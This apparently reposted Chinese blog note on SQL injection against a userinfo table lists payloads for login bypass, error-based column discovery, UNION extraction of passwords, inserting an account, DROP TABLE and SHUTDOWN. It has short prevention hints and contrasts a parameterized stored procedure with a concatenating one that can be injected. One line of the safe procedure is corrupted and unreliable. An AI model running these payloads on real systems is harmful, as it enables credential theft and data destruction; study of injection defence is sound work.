zoukankan      html  css  js  c++  java

  • SQL注入攻击<收藏>

    -SQL注入攻击
    --以任何用户登入(预防:采用参数形式)
    select * from  dbo.userinfo where userName='' and userPwd=''or 1=1--'
    select * from  dbo.userinfo where userName=''or 1=1--'
    --查看除VINET外所有信息
    select * from  dbo.userinfo where userID='VINET' OR 1=1
    --利用已知会员名登入
    select * from  dbo.userinfo where userName='admin '--'
    --利用错误一步步获取信息(预防:自定义错误提示页面)
    select * from  dbo.userinfo where userName=''HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName,UserPwd HAVING 1=1--'
    --根据上面错误信息所得数据向表插入数据(成功!)
    select * from  dbo.userinfo where userName='';INSERT INTO userinfo Values('hacker','hacker')--'
    --破坏性删除表
    select * from  dbo.userinfo where userName='';drop table dbo.Hello--'
    --逐步获取用户账户信息
    select * from  dbo.userinfo where userName=''UNION SELECT 'abc',1,1 FROM userinfo --' --检查类型
    select * from  dbo.userinfo where userName=''UNION SELECT 1,1,1 FROM userinfo --' 获取标题字段
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,1 FROM userinfo WHERE UserName>'a'--' --取得所有账户名
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,userPwd FROM userinfo where UserName>'a'--' --获取账户密码信息

    --停止服务(权限足够) (;DROP Database D_Name --、 ;DROP TABLE T_Name --)
    select * from  dbo.userinfo where userName='' ;SHUTDOWN--'
    --


    exec dbo.SafeQueryCustomers 'l','l'
    exec dbo.SafeQueryCustomers2 'l','' or 1=1 --'

    CREATE PROCEDURE dbo.SafeQueryCustomers
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''
       
        IF NOT @userName IS NULL 
        BEGIN
           SET @WK = @WK + ' userName LIKE @puserName AND  '
           SET @userName = '%' +@userName + '%'
        END  
       
        IF NOT @userPwd IS NULL    
        BEGIN
           SET @WK = @WK + ' userPwd LIKE @puserPwd AND  '
           SET @userPwd = '%' +@userPwd + '%'
        END  
        IF LEN(@STR) > 0
        BEGIN
           SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
           exec sp_executesql @STR,
    mailto:N%27@puserName nvarchar(30),@puserPwd nvarchar(12)',
    @puserName=@userName,@puserPwd=@userPwd
        End  
        ELSE
           exec sp_executesql @STR
    =============================================

    CREATE PROCEDURE dbo.SafeQueryCustomers2
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''
       
        IF NOT @userName IS NULL 
        BEGIN
           SET @WK = @WK + ' userName LIKE ''%' +@userName + '%'' AND  ' 
        END  
       
        IF NOT @userPwd IS NULL    
        BEGIN
           SET @WK = @WK + ' userPwd LIKE ''%' +@userPwd + '%'' AND  '
          
        END  
         IF LEN(@STR) > 0
        BEGIN
           SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
           exec sp_executesql @STR
        End  
        ELSE
           exec sp_executesql @STR
  • 相关阅读:
    我的知识库(4) java获取页面编码(Z)
    知识库(3)JAVA 正则表达式 (超详细)
    The Struts dispatcher cannot be found. This is usually caused by using Struts tags without the associated filter. Struts
    某人总结的《英语听力的技巧 》,挺搞的
    我的知识库(5)java单例模式详解
    构建可扩展程序
    SerialPort (RS232 Serial COM Port) in C# .NET
    Python学习笔记——String、Sequences
    UI题目我的答案
    jQuery学习系列学会操纵Form表单元素(1)
  • 原文地址:https://www.cnblogs.com/Golf9527/p/1558711.html
Copyright © 2011-2022 走看看